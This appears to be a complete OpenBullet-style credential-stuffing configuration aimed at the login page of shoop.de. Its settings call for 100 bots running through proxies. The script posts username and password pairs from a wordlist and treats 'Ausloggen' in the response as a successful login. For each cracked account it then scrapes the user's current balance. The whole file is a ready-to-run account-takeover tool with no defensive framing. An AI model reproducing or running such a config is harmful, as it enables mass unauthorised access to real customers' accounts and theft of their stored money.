[SETTINGS]
{
  "Name": "shoop",
  "SuggestedBots": 100,
  "LastModified": "2018-05-26T13:07:26.4684255+00:00",
  "AdditionalInfo": "",
  "Author": "Jeff199",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST GET "https://www.shoop.de/login.php" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_SEARCH_TYPE PARSE "<SOURCE>" LR "type=" "\"" Recursive=FALSE -> VAR "SEARCH_TYPE" "" "" 
#POST_LOGIN REQUEST POST "https://www.shoop.de/login.php" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&login_back=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "Ausloggen" 
  KEYCHAIN Failure OR 
    KEY "Einloggen" 
#account_bal REQUEST GET "https://www.shoop.de/my/?t=my_news" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_balance PARSE "<SOURCE>" LR "rent\">" "<" Recursive=FALSE -> CAP "amount current" "" "" 
